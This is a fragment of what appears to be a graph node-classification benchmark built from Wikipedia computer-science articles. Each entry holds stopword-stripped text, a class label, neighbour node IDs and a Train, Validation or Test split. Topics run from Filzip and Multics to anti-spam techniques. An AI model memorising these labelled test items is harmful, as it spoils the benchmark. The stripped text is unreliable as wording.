    "text": "Filzip:filzip filzip freeware file archiver program microsoft windows platform written philipp engel free author request donations help cost development reward work march 2019 new version released since version 3.0.6 filzip presumed unmaintained software development program localized twenty languages filzip supports seven different archive formats allowing user add extract files archives include zip bh cab jar lha lzh tar gzip handful formats supported extraction including ace arc arj rar zoo files within formats viewed without explicitly unpacking removed renamed within archive zip files may spanned written number files fixed maximum size placed removable media program integration create self-extracting executable archives redistribution without licensing fees cnet rated 4/5 stars wrote easy program operation sets freeware file compression tool apart crowded genre",
    "neighbors": [
      5380,
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
      7983,
      950,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      7529,
      4459,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 6760,
    "label": 2,
    "text": "SOX_(operating_system):sox operating system sox name unix clone developed scratch brazil late 1980s computadores e sistemas brasileiros s/a cobra tecnologia leadership ivan da costa marques certified unix-compatible x/open unisoft early 1989 sox one first re-implementation unix fully independent passed x/open verification tests one ever completed 100 outside united states sox designed run cobra minicomputers part brazilian informatics policy aimed achieve technological independence united states despite technical success sox came late cobra largely lost support sox development stopped soon certified government decided instead allow import unix system v release 4.0",
    "neighbors": [
      8207,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10333,
      97,
      8298,
      7285,
      9335,
      2168,
      633,
      1147,
      3197,
      1150,
      2179,
      6787,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      3241,
      3248,
      6837,
      8388,
      10436,
      9932,
      5840,
      7382,
      8410,
      6369,
      1253,
      5363,
      2811,
      2301,
      10499,
      1804,
      6412,
      273,
      11539,
      5397,
      1304,
      10016,
      2345,
      7983,
      823,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      10590,
      8551,
      5492,
      2424,
      394,
      3978,
      7057,
      11667,
      8092,
      3487,
      421,
      11184,
      2995,
      9141,
      6075,
      6078,
      9151,
      8136,
      6128,
      5619,
      10235
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6761,
    "label": 5,
    "text": "WebFinger:webfinger webfinger protocol specified internet engineering task force ietf allows discovery information people things identified uri information person might discovered via acct uri example uri looks like email address webfinger specified discovery protocol openid connect protocol allows one easily log various sites internet webfinger protocol used federated social networks gnu social statusnet diaspora discover users federated nodes pods well remotestorage protocol historical note name webfinger derived old arpanet finger protocol different protocol designed http protocol payload represented json",
    "neighbors": [
      9313,
      10727,
      7368,
      6761,
      10154,
      574
    ],
    "mask": "None"
  },
  {
    "node_id": 6762,
    "label": 4,
    "text": "Anti-spam_techniques:anti-spam techniques various anti-spam techniques used prevent email spam unsolicited bulk email technique complete solution spam problem trade-offs incorrectly rejecting legitimate email false positives opposed rejecting spam false negatives – associated costs time effort cost wrongfully obstructing good mail anti-spam techniques broken four broad categories require actions individuals automated email administrators automated email senders employed researchers law enforcement officials number techniques individuals use restrict availability email addresses goal reducing chance receiving spam sharing email address among limited group correspondents one way limit chance address harvested targeted spam similarly forwarding messages number recipients n't know one another recipient addresses put bcc field recipient get list recipients email addresses email addresses posted webpages usenet chat rooms vulnerable e-mail address harvesting address munging practice disguising e-mail address prevent automatically collected way still allow human reader reconstruct original email address nowiki no-one example.com /nowiki might written no-one example dot com instance related technique display part email address image jumbled text order characters restored using css common piece advice reply spam messages spammers may simply regard responses confirmation email address valid similarly many spam messages contain web links addresses user directed follow removed spammer mailing list – treated dangerous case sender addresses often forged spam messages responding spam may result failed deliveries – may reach completely innocent third parties businesses individuals sometimes avoid publicising email address asking contact come via contact form webpage – typically forwards information via email forms however sometimes inconvenient users able use preferred email client risk entering faulty reply address typically notified delivery problems contact forms drawback require website appropriate technology many modern mail programs incorporate web browser functionality display html urls images avoiding disabling feature help avoid spam may however useful avoid problems user opens spam message offensive images tracked web bugs targeted javascript attacks upon security vulnerabilities html renderer mail clients automatically download display html images attachments fewer risks clients configured display default email user may sometimes need give address site without complete assurance site owner use sending spam one way mitigate risk provide disposable email address — address user disable abandon forwards email real account number services provide disposable address forwarding addresses manually disabled expire given time interval expire certain number messages forwarded disposable email addresses used users track whether site owner disclosed address security breach systems use ham passwords ask unrecognised senders include email password demonstrates email message ham spam message typically email address ham password would described web page ham password would included subject line email message appended username part email address using plus addressing technique ham passwords often combined filtering systems let messages identified ham tracking spammer isp reporting offense lead spammer service terminated criminal prosecution unfortunately difficult track spammer online tools spamcop network abuse clearinghouse assist always accurate historically reporting spam way played large part abating spam since spammers simply move operation another url isp network ip addresses many countries consumers may also forward unwanted deceptive commercial email authorities e.g us email address spam uce.gov maintained us federal trade commission ftc similar agencies countries large number applications appliances services software systems email administrators use reduce load spam systems mailboxes general attempt reject block majority spam email outright smtp connection stage accept message typically analyze content – may decide quarantine categorised spam number systems developed allow domain name owners identify email authorized many systems use dns list sites authorized send email behalf many proposals spf dkim dmarc widely supported growing adoption directly attacking spam systems make much harder spoof addresses common technique spammers also used phishing types fraud via email method may used internet service providers specialized services enterprises combat spam require unknown senders pass various tests messages delivered strategies termed challenge/response systems checksum-based filter exploits fact messages sent bulk identical small variations checksum-based filters strip everything might vary messages reduce remains checksum look checksum database distributed checksum clearinghouse collects checksums messages email recipients consider spam people button email client click nominate message spam checksum database message likely spam avoid detected way spammers sometimes insert unique invisible gibberish known hashbusters middle messages make message unique checksum email servers expect never communicate particular countries receive great deal spam therefore use country-based filtering – technique blocks email certain countries technique based country origin determined sender ip address rather trait sender large number free commercial dns-based blacklists dnsbls allow mail server quickly look ip incoming mail connection reject listed administrators choose scores dnsbls reflects different policies list sites known emit spam others list open mail relays proxies others list isps known support spam spam/phishing messages contain url entice victims clicking thus popular technique since early 2000s consists extracting urls messages looking databases spamhaus domain block list dbl surbl uribl many spammers use poorly written software unable comply standards legitimate control computer using send spam zombie computer setting tighter limits deviation rfc standards mta accept mail administrator reduce spam significantly also runs risk rejecting mail older poorly written configured servers greeting delay – sending server required wait received smtp greeting banner sends data deliberate pause introduced receiving servers allow detect deny spam-sending applications wait receive banner temporary rejection – greylisting technique built fact smtp protocol allows temporary rejection incoming messages greylisting temporarily rejects messages unknown senders mail servers – using standard 4xx error codes compliant mtas proceed retry delivery later many spammers spambots downside legitimate messages first-time senders experience delay delivery helo/ehlo checking – says smtp server may verify domain name argument ehlo command actually corresponds ip address client however verification fails server must refuse accept message basis systems however configured invalid pipelining – several smtp commands allowed placed one network packet pipelined example email sent cc header several smtp rcpt commands might placed single packet instead one packet per rcpt command smtp protocol however requires errors checked everything synchronized certain points many spammers send everything single packet since care errors efficient mtas detect invalid pipelining reject email sent way nolisting – email servers given domain specified prioritized list via mx records nolisting technique simply adding mx record pointing non-existent server primary i.e lowest preference value – means initial mail contact always fail many spam sources retry failure spammer move next victim legitimate email servers retry next higher numbered mx normal email delivered brief delay quit detection – smtp connection always closed quit command many spammers skip step spam already sent taking time properly close connection takes time bandwidth mtas capable detecting whether connection closed correctly use measure trustworthy system another approach simply imitation mta gives appearance open mail relay imitation tcp/ip proxy server gives appearance open proxy spammers probe systems open relays/proxies find host attempt send mail wasting time resources potentially revealing information origin spam sending entity operates honeypot system may simply discard spam attempts submit dnsbls store analysis spamassassin policyd-weight others use various tests spam assigns numerical score test message scanned patterns applicable scores tallied total fixed value message rejected flagged spam ensuring single spam test flag message spam false positive rate greatly reduced outbound spam protection involves scanning email traffic exits network identifying spam messages taking action blocking message shutting source traffic primary impact spam spam recipients sending networks also experience financial costs wasted bandwidth risk ip addresses blocked receiving networks outbound spam protection stops spam also lets system administrators track spam sources network remediate – example clearing malware machines become infected virus participating botnet ptr dns records reverse dns used number things including content filtering techniques rely specification lists words regular expressions disallowed mail messages thus site receives spam advertising herbal viagra administrator might place phrase filter configuration mail server would reject message containing phrase header filtering looks header email contains information origin destination content message although spammers often spoof fields header order hide identity try make email look legitimate many spoofing methods detected violation rfc 5322 standard header formed also serve basis rejecting message since large percentage spam forged invalid sender addresses spam detected checking address valid mail server try verify sender address making smtp connection back mail exchanger address creating bounce stopping email sent callback verification various drawbacks 1 since nearly spam forged return addresses nearly callbacks innocent third party mail servers unrelated spam 2 spammer uses trap address sender address receiving mta tries make callback using trap address mail command receiving mta ip address blacklisted 3 finally standard vrfy expn commands used verify address exploited spammers mail administrators enable leaving receiving smtp server effective way validate sender email address smtp proxies allow combating spam real time combining sender behavior controls providing legitimate users immediate feedback eliminating need quarantine spamtrapping seeding email address spammers find normal users email address used sender must spammer black listed example email address spamtrap example.org placed source html web site way n't displayed web page human visitors website would see spammers hand use web page scrapers bots harvest email addresses html source code would find address spammer later sends address spamtrap knows highly likely spammer take appropriate action statistical bayesian filtering set requires administrative maintenance per se instead users mark messages spam nonspam filtering software learns judgements thus matched end user needs long users consistently mark/tag emails respond quickly changes spam content statistical filters typically also look message headers considering content also peculiarities transport mechanism email software programs implement statistical filtering include bogofilter dspam spambayes assp crm114 email programs mozilla mozilla thunderbird mailwasher later revisions spamassassin tarpit server software intentionally responds extremely slowly client commands running tarpit treats acceptable mail normally known spam slowly appears open mail relay site slow rate spammers inject messages mail facility depending server internet speed tarpit slow attack factor around 500 many systems simply disconnect server n't respond quickly eliminate spam however legitimate email systems also deal correctly delays fundamental idea slow attack perpetrator waste time without significant success organization successfully deploy tarpit able define range addresses protocols ports deception process involves router passing supported traffic appropriate server sent contacts sent tarpit examples tarpits include labrea tarpit honeyd smtp tarpits ip-level tarpits variety techniques email senders use try make sure send spam failure control amount spam sent judged email receivers often cause even legitimate email blocked sender put dnsbls since spammer accounts frequently disabled due violations abuse policies constantly trying create new accounts due damage done isp reputation source spam many isps web email providers use captchas new accounts verify real human registering account automated spamming system also verify credit cards stolen accepting new customers check spamhaus project rokso list background checks malicious person easily attempt subscribe another user mailing list — harass make company organisation appear spamming prevent modern mailing list management programs gnu mailman listserv majordomo qmail ezmlm support confirmed opt-in default whenever email address presented subscription list software send confirmation message address confirmation message contains advertising content construed spam address added live mail list unless recipient responds confirmation message email senders typically type anti-spam checks email coming users customers inward email coming rest internet protects reputation could otherwise harmed case infection spam-sending malware receiving server initially fully accepts email later determines message spam non-existent recipient generate bounce message back supposed sender however often case spam sender information incoming email forged unrelated third party bounce message backscatter spam reason generally preferable rejection incoming email happen smtp connection stage 5xx error code sending server still connected case sending server report problem real sender cleanly firewalls routers programmed allow smtp traffic tcp port 25 machines network supposed run mail transfer agents send email practice somewhat controversial isps block home users especially isps allow blocking turned upon request email still sent computers designated smart hosts via port 25 smart hosts via email submission port 587 network address translation used intercept port 25 smtp traffic direct mail server enforces rate limiting egress spam filtering commonly done hotels cause email privacy problems well making impossible use starttls smtp-auth port 587 submission port n't used machines suddenly start sending lots email may well become zombie computers limiting rate email sent around typical computer question legitimate email still sent large spam runs slowed manual investigation done monitoring spam reports places spamcop aol feedback loop network abuse clearinghouse domain abuse mailbox etc. isps often learn problems seriously damage isp reputation mail servers blacklisted malicious software human spam senders often use forged addresses sending spam messages control may enforced smtp servers ensure senders use correct email address field outgoing messages email users database user record email address smtp server must check email address field outgoing message address belongs user credentials supplied smtp authentication field forged smtp error returned email client e.g email address trying send isps webmail providers either acceptable use policy aup terms service tos agreement discourages spammers using system allows spammer terminated quickly violations 2000 onwards many countries enacted specific legislation criminalize spamming appropriate legislation enforcement significant impact spamming activity legislation provides specific text bulk emailers must include also makes legitimate bulk email easier identify increasingly anti-spam efforts led co-ordination law enforcement researchers major consumer financial service companies internet service providers monitoring tracking email spam identity theft phishing activities gathering evidence criminal cases analysis sites spamvertised given piece spam often followed domain registrars good results several approaches proposed improve email system since spamming facilitated fact large volumes email inexpensive send one proposed set solutions would require senders pay cost order send email making prohibitively expensive spammers anti-spam activist daniel balsam attempts make spamming less profitable bringing lawsuits spammers artificial intelligence techniques deployed filtering spam emails artificial neural networks algorithms bayesian filters methods use probabilistic methods train networks examination concentration frequency words seen spam versus legitimate email contents channel email new proposal sending email attempts distribute anti-spam activities forcing verification probably using bounce messages back-scatter occur first email sent new contacts spam subject several research conferences including",
    "neighbors": [
      1667,
      3462,
      519,
      9222,
      8202,
      7949,
      8334,
      8337,
      914,
      4883,
      5012,
      8341,
      3350,
      3991,
      9106,
      1305,
      10263,
      10904,
      1436,
      8093,
      10906,
      11418,
      8224,
      10275,
      10531,
      9256,
      2601,
      6699,
      8747,
      10541,
      3246,
      4272,
      9909,
      2358,
      9145,
      7739,
      3645,
      4414,
      1472,
      8130,
      4163,
      4547,
      4421,
      4294,
      10184,
      3145,
      10696,
      10826,
      10578,
      7764,
      1495,
      3032,
      9053,
      2527,
      9824,
      11487,
      10210,
      3941,
      4325,
      6246,
      488,
      1771,
      1899,
      4843,
      9588,
      1653,
      2677,
      6261,
      10105
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6763,
    "label": 2,
    "text": "Openmoko_Linux:openmoko linux openmoko linux operating system smartphones developed openmoko project based ångström distribution comprising various pieces free software main targets openmoko linux openmoko neo 1973 neo freerunner furthermore efforts port system mobile phones openmoko linux developed 2007 2009 openmoko inc development discontinued financial problems afterwards development software openmoko phones taken community continued various projects including shr qtmoko hackable1 openmoko linux uses linux kernel gnu libc x.org server plus graphical user environment built using efl toolkit gtk+ toolkit qt toolkit illume window manager previously matchbox window manager openembedded build framework opkg package management system used create maintain software packages different approach android everything except linux webkit java language inside android seems non-standard applications targeted android must substantially rewritten largely portable many existing gnu/linux desktop apps easily ported openmoko however limited computational power screen resolution require substantial reworking existing applications order render usable finger-oriented small-screen environment",
    "neighbors": [
      9732,
      5637,
      6,
      11271,
      3089,
      10780,
      3618,
      3626,
      5677,
      7727,
      9784,
      1083,
      10817,
      1602,
      7246,
      7253,
      3162,
      607,
      2658,
      1138,
      8315,
      8316,
      8829,
      11391,
      4225,
      2179,
      6276,
      7812,
      8326,
      9356,
      2195,
      10393,
      6301,
      1694,
      673,
      3248,
      7857,
      5824,
      4305,
      2259,
      1761,
      8423,
      4841,
      5363,
      5875,
      5369,
      7938,
      4360,
      4364,
      1813,
      5406,
      4383,
      10537,
      7983,
      823,
      7991,
      7492,
      11079,
      4957,
      10080,
      10599,
      6508,
      2925,
      4493,
      11155,
      7579,
      4011,
      9646,
      9660,
      5067,
      2001,
      8147,
      3542,
      5095,
      10215,
      3561,
      495,
      1524
    ],
    "mask": "None"
  },
  {
    "node_id": 6764,
    "label": 5,
    "text": "EIA-530:eia-530 currently known tia-530-a often called eia-530 rs-530 balanced serial interface standard generally uses 25-pin connector originally created telecommunications industry association finalized 1987 revision finalized 1992 specification defines cable dte dce devices used conjunction eia-422 eia-423 define electrical signaling characteristics tia-530 calls common 25 pin connector displaced similar eia-449 also uses eia-422/423 larger 37-pin connector two types interchange circuits signals leads dce dte defined tia-530 category uses balanced characteristics eia-422 category ii unbalanced eia-423 interchange circuits category exception local loopback pin 18 remote loopback pin 21 test mode pin 25 category ii tia-530 originally used category circuits commonly called data set ready dce ready pins 6 22 data terminal ready dte ready pins 20 23 revision changed interchange circuits category ii para 4.3.6 4.3.7 standard added ring indicator pin 22 pin 23 grounded tia-530-a confusion revisions led many incorrect wiring diagrams interface manufacturers still adhere original tia-530 standard care taken ensure devices standard connecting avoid complications",
    "neighbors": [
      6681
    ],
    "mask": "Test"
  },
  {
    "node_id": 6765,
    "label": 3,
    "text": "Compaq_Presario:compaq presario presario series desktop computers notebooks compaq presario family computers launched consumer marketplace september 1993 mid-1990s compaq began manufacturing pc monitors part presario brand series all-in one units containing pc monitor case also released although hp acquired compaq 2002 presario name used compaq brand discontinued 2013 hp due marketability issues all-in-one computers containing pc monitor unit mvx00 fpx00 monitors designed sold series 3 designed compaq towers retained original spaceship shape second generation compaq presario towers except smoked-black plastic flip-up doors slightly squatter design rounded generation 2 presario towers lacked smoked plastic easy access door usb audio ports behind black smoked cd bezel covers fp meant flat panel display one first offered home pc 1x25 monitors paired presario 4500 4600 4800 series 2 designed compaq presarios originators rocket ship shape tower faceplate monitors shared design cues split lower bezel ran middle like towers meant match rare set monitors fx series built-in speakers subwoofer three extra usb ports designed go 4800 series presario multimedia towers—specifically 4830 4882 black like fx monitor monitors came jbl pro speakers could mount side monitor fx exception built-in jbl pro powered speakers subwoofer rear casing",
    "neighbors": [
      5384,
      3214,
      8212,
      9239,
      1304,
      3357,
      8229,
      7213,
      6447,
      5821,
      1981,
      5571,
      7243,
      1357,
      4175,
      3281,
      1874,
      2258,
      11100,
      1638,
      5736,
      11505,
      2037,
      5756,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 6766,
    "label": 4,
    "text": "Gigamon:gigamon gigamon privately held network visibility traffic monitoring technology vendor formerly traded publicly owned elliott management headquartered santa clara california gigamon 371 employees december 27 2014 743 employees april 2017 company proprietary products manipulate route traffic various application performance network management analysis compliance security tools gigamon founded 2004 gigamon systems llc company went public new york stock exchange june 11 2013 initial public offering june 12 2013 investors bought 6.75 million shares priced 19 generating 128 million sales gigamon officials rang closing bell new york stock exchange february 24 2016 january 2018 company acquired elliott management corporation qatar investment authority qia 1,6 billion us gigamon develops physical virtual network visibility technologies including network tap aggregation products traffic manipulation applications visibility fabric nodes",
    "neighbors": [
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 6767,
    "label": 9,
    "text": "Daniel_P._Friedman:daniel p. friedman daniel paul friedman born 1944 professor computer science indiana university bloomington indiana research focuses programming languages prominent author field david wise friedman wrote highly influential paper lazy programming specifically lazy streams icalp 1976 paper entitled cons evaluate arguments one first publications pushing exploration programming style potentially infinite data structures form programming employs computational effects though programs may diverge 1970s friedman wise explored topic depth also considered extensions world parallel computing 1980s friedman turned study scheme programming language explored use macros defining programming languages eugene kohlbecker matthias felleisen bruce duba co-introduced notion hygienic macros 1986 lfp paper still widely cited today christopher t. haynes mitchell wand simultaneously studied nature continuation objects uses possibilities constraining following friedman felleisen introduced lambda calculus continuations control operators work spawned work semantics connections classical logic computation practical extensions continuations friedman also prolific textbook author first textbook little lisper dates back 1974 still print fourth edition called little schemer felleisen friedman felleisen wrote three little books 1990s little mler seasoned schemer little java patterns friedman also lead author essentials programming languages textbook programming languages changed landscape language textbooks 1980s shifting focus surveys languages study principles via series interpreters today textbooks topic tend follow organization employing operational semantics type theory instead interpreters like little lisper essentials programming languages long-living book third edition recently friedman resumed work little series reasoned schemer william e. byrd oleg kiselyov explaining logic programming via extension scheme little prover carl eastlund introducing inductive proofs way determine facts computer programs daniel p. friedman author co-author following books",
    "neighbors": [
      10083,
      6502,
      4839,
      6536,
      8262,
      5837,
      5677,
      1613,
      6767,
      6673,
      10324,
      9749,
      10584,
      7386
    ],
    "mask": "Test"
  },
  {
    "node_id": 6768,
    "label": 4,
    "text": "HDClone:hdclone hdclone disk cloning backup application miray software supports copying storage devices sector-by-sector well file-by-file allows create physical logical identical copy supported x86 x64 computer architectures windows desktop versions xp 10 windows server versions 2003 2016 hdclone offered free download pay version may also purchased data cd license model freemium price policy hdclone home users professional users hdclone offered seven languages website focuses german english several hundred thousand users worldwide sold 140 countries primary aim hdclone cloning storage devices creating restoring storage device images generally possible start hdclone directly windows stand-alone boot media boot media possible implement bare-metal restore windows hdclone offers command-line interface allows automatic control e.g combination windows task scheduler enterprise edition possible write 16 storage devices separate tool miray virtual disk possible mount images windows virtual drives order access content hdclone offered several editions free edition free charge offers basic functionality cloning creating respectively restoring images additional functionalities higher editions must purchased additional functions include others depending edition hdclone following additional software modules hdclone supports edition-dependent following functionalities listed file systems possible make usb drive optical medium bootable order start hdclone independently windows also allows copy operating systems hdclone executable file ca n't started uses either miray symobi linux host operating system symobi proprietary real-time operating system miray software sole base starting hdclone via boot media first 5 years hdclone 3.5 symobi based message-oriented operating system µnos based real-time kernel sphere µnos version 0.92 officially presented 1 august 2001 intermediately sphere sp 2.0 released 14 may 2002 symobi presented first time version 1.2 systems fair munich year 2006 following year version 1.4 multi-core support 32 processor cores separate tool miray virtual disk possible mount hdclone created images windows virtual drives allows access contained data via windows explorer depending edition possible mount 1 7 images time optionally permanently writeable content mounted image changed changes stored overlay functions differential image may also included restoring respective image 31 march 2003 hdclone version 1.0 announced 25 april 2003 hdclone officially presented hdclone started stand-alone product required boot media start five years version 3.6 also possible start hdclone directly windows however parallel writing multiple storage devices already realised enterprise edition one year 2010 came version 3.9 command-line interface automatic control year miray virtual disk added separate tool version 4.0 allowed open hdclone images virtual storage devices first time four years version 5.0 equipped support sata hot plugging since 2017 possible use linux additional host operating system stand-alone boot media hdclone 7 various german computer magazines like pc magazin computerbild com computerwoche chip published tips use hdclone duplicating hard disk drive content internationally hdclone mainly described via digital journalism free edition praised german computer magazines clear simple user interface recommended copying small hard disk drives criticized limited left functionalities available paid versions reduced data transfer rate mentioned regard time time reports highlight practice boot media allows using hdclone independently installed operating system hdclone mentioned example disk cloning software international books international books use hdclone also case example disk cloning software detailed description",
    "neighbors": [
      1280,
      2193,
      2197,
      9366,
      2199,
      4505,
      9762,
      7983,
      11568,
      10675,
      823,
      9025,
      9420,
      9932,
      1358,
      7905,
      4074,
      5356,
      3314,
      499,
      5363,
      246,
      3834
    ],
    "mask": "None"
  },
  {
    "node_id": 6769,
    "label": 7,
    "text": "Master/slave_(technology):master/slave technology master/slave model communication one device process unidirectional control one devices systems master selected group eligible devices devices acting role slaves context motor control master/slave configuration used load sharing purposes two identical motors connected two different drives coupled common load one drive defined master configured running speed-control mode whereas defined slave configured running torque-control mode terminology often replaced something different terms master slave allude practice slavery one alternative databases primary replica used documentation ibm microsoft engine yard amazon web services/amazon relational database service acm well python django drupal couchdb redis mediawiki still uses master configuration management tool salt uses terms master minion december 2017 internet systems consortium decided allow words primary secondary substitute master/slave terminology dns server software bind 2003 county los angeles california asked manufacturers suppliers contractors stop using master slave terminology products county made request based cultural diversity sensitivity los angeles county following outcries request county los angeles issued statement saying decision nothing request following controversy global language monitor found term master/slave egregious example political correctness 2004 named politically incorrect term year",
    "neighbors": [
      7681,
      4423,
      3784,
      5833,
      7497,
      8554,
      4396,
      10681,
      2222,
      7022,
      1136,
      7248,
      7347,
      6037,
      1049,
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 6770,
    "label": 1,
    "text": "Binary_large_object:binary large object binary large object blob collection binary data stored single entity database management system blobs typically images audio multimedia objects though sometimes binary executable code stored blob database support blobs universal blobs originally big amorphous chunks data invented jim starkey dec describes thing ate cincinnati cleveland whatever 1958 steve mcqueen movie referring blob later terry mckiever marketing person apollo felt needed acronym invented backronym basic large object informix invented alternative backronym binary large object data type definition introduced describe data originally defined traditional computer database systems particularly large store practically time field database systems first defined 1970s 1980s data type became practical disk space became cheap definition gained popularity ibm db2 term used nosql databases especially key-value store databases redis name blob borrowed deep learning software caffe represent multi-dimensional arrays world free open-source software term also borrowed refer proprietary device drivers distributed without source code exclusively binary code use term binary blob common even though first letter blob abbreviation already stands binary depending implementation culture around usage concept might alternately referred basic large object binary data type",
    "neighbors": [
      2432,
      6850,
      7868,
      8291,
      10693,
      8295,
      1449,
      1964,
      653,
      10389,
      11030,
      3323,
      1276
    ],
    "mask": "Test"
  },
  {
    "node_id": 6771,
    "label": 2,
    "text": "BootX_(Apple):bootx apple bootx software-based bootloader designed developed apple inc. use company macintosh computer range bootx used prepare computer use loading required device drivers starting-up mac os x booting kernel powerpc macintoshes running mac os x 10.2 operating system later versions using bootrom read-only memory rom computer chip containing openfirmware graphical bootsplash shown briefly compatible macintosh computers grey apple logo spinning cursor appears startup sequence program freely available part darwin operating system open-source apple public source license bootx superseded another nearly identical bootloader named codice_1 extensible firmware interface rom release intel-based mac older macintoshes dating 1983 1998 utilized basic bootloader bootloader solely rom chip varying sizes 4 megabytes mb contained computer code boot computer run mac os operating system known macintosh toolbox old world rom differs greatly design modern macintosh generally use hard drive large capacity store operating system bootloader used macintosh computers mid-1998 advent imac series macintoshes firmware updated rom reduced size 1 mb called bootrom remainder rom moved file codice_2 mac os system folder stored hard drive rom used full implementation openfirmware standard contained bootrom named new world rom 2001 release mac os x 10.0 codice_2 file replaced codice_4 bootloader file 2002 release mac os x 10.2 historical happy mac start-up picture replaced grey apple logo introducing intel mac 2006 bootrom replaced near identical extensible firmware interface rom although apple still calls bootrom codice_1 file make boot loader appealing operating system developers apple added features allow flexibility booting process network boot using tftp load mach-o elf formatted kernels bootx also boot hfs hfs+ ufs ext2 formatted volumes boot loader manipulated startup holding various key combinations alter booting process functions include verbose mode achieved holding command v key startup replaces default apple logo text-based information boot process single user mode achieved holding command depending operating system may boot basic command-line text-based version operating system facilitate maintenance recovery action rom also set require password access technical functions using openfirmware interface powerpc-based macintoshes boot process starts activation bootrom basic macintosh rom performs power self test test hardware essential startup passing test startup chime played control computer passed openfirmware openfirmware initializes random access memory memory management unit hardware necessary rom operation openfirmware checks settings stored nvram builds list devices device tree gathering stored fcode information completion task bootx takes startup process configuring keyboard display claiming reserving memory various purposes checking see various key combinations pressed process completed bootx displays grey apple logo spins spinning wait cursor proceeds load kernel kernel extensions start kernel",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      2197,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      7375,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      2811,
      3324,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4438,
      4457,
      9100,
      9109,
      1439,
      10153,
      8114,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163,
      8700
    ],
    "mask": "Train"
  },
  {
    "node_id": 6772,
    "label": 2,
    "text": "Multics:multics multics multiplexed information computing service influential early time-sharing operating system based concept single-level memory virtually modern operating systems heavily influenced multics – often unix created people worked multics – either directly linux macos indirectly windows nt initial planning development multics started 1964 cambridge massachusetts originally cooperative project led mit project mac fernando corbató along general electric bell labs developed ge 645 computer specially designed first one delivered mit january 1967 multics conceived commercial product general electric became one honeywell albeit successfully due many novel valuable ideas multics significant impact computer science despite faults multics numerous features intended ensure high availability would support computing utility similar telephone electricity utilities modular hardware structure software architecture used achieve system could grow size simply adding appropriate resource computing power main memory disk storage separate access control lists every file provided flexible information sharing complete privacy needed multics number standard mechanisms allow engineers analyze performance system well number adaptive performance optimization mechanisms multics implemented single-level store data access discarding clear distinction files called segments multics process memory memory process consisted solely segments mapped address space read write process simply used normal central processing unit cpu instructions operating system took care making sure modifications saved disk posix terminology every file codice_1ed however multics concept process memory separate memory used hold mapped-in files unix memory system part segment appeared file system included temporary scratch memory process kernel stack etc one disadvantage size segments limited 256 kilowords 1 mib due particular hardware architecture machines multics ran 36-bit word size index registers used address within segments half size 18 bits extra code used work files larger called multisegment files days one megabyte memory prohibitively expensive large databases later huge bitmap graphics limit rarely encountered another major new idea multics dynamic linking running process could request segments added address space segments could contain code could execute allowed applications automatically use latest version external routine called since routines kept segments dynamically linked process first tried begin execution since different processes could use different search rules different users could end using different versions external routines automatically equally importantly appropriate settings multics security facilities code segment could gain access data structures maintained different process thus interact application running part daemon another process user process simply performed normal procedure-call instruction code segment dynamically linked code segment implemented operation associated daemon code segment could modify data maintained used daemon action necessary commence request completed simple procedure return instruction returned control user process user code multics also supported extremely aggressive on-line reconfiguration central processing units memory banks disk drives etc could added removed system continued operating mit system early software development done common practice split multiprocessor system two separate systems off-hours incrementally removing enough components form second working system leaving rest still running original logged-in users system software development testing could done second system components second system added back main user system without ever shut multics supported multiple cpus one earliest multiprocessor systems multics first major operating system designed secure system outset despite early versions multics broken repeatedly led work made system much secure prefigured modern security engineering techniques break-ins became rare second-generation hardware base adopted hardware support ring-oriented security multilevel refinement concept master mode multics first operating system provide hierarchical file system file names could almost arbitrary length syntax given file directory could multiple names typically long short form symbolic links directories also supported multics first use now-standard concept per-process stacks kernel separate stack security ring also first command processor implemented ordinary user code – idea later used unix shell also one first written high-level language multics pl/i burroughs mcp system written algol 1964 multics developed initially ge-645 mainframe 36-bit system ge computer business including multics taken honeywell 1970 around 1973 multics supported honeywell 6180 machines included security improvements including hardware support protection rings bell labs pulled project 1969 people worked went create unix system multics development continued mit general electric honeywell continued system development 1985 80 multimillion-dollar sites installed universities industry government sites french university system several installations early 1980s honeywell stopped supporting multics users migrated systems like unix 1985 multics issued certification b2 level secure operating system using trusted computer system evaluation criteria national computer security center ncsc division nsa first operating system evaluated level multics distributed 1975 2000 groupe bull europe bull hn information systems inc. united states 2006 bull sas open sourced multics versions mr10.2 mr11.0 mr12.0 mr12.1 mr12.2 mr12.3 mr12.4 mr12.5 last known multics installation running natively honeywell hardware shut october 30 2000 canadian department national defence halifax nova scotia canada 2006 bull hn released source code mr12.5 final 1992 multics release mit system available open-source software exception optional pieces tcp/ip 2014 multics successfully run current hardware using simulator 1.0 release simulator available release 12.6f multics accompanies 1.0 release emulator adds new features including command line recall editing using video system peter h. salus author book covering unix early years stated one position multics tried much versatile flexible operating system failed miserably position however widely discredited computing community many multics technical innovations used modern commercial computing systems permanently resident kernel multics system derided day large complex 135 kb code comparison linux system 2007 might occupied 18 mb first mit ge-645 512 kilowords memory 2 mib truly enormous amount time kernel used moderate portion multics main memory entire system including operating system complex pl/1 compiler user commands subroutine libraries consisted 1500 source modules averaged roughly 200 lines source code compiled produce total roughly 4.5 mib procedure code fairly large standards day multics compilers generally optimised code density cpu performance example using small sub-routines called operators short standard code sequences makes comparison object code size modern systems less useful high code density good 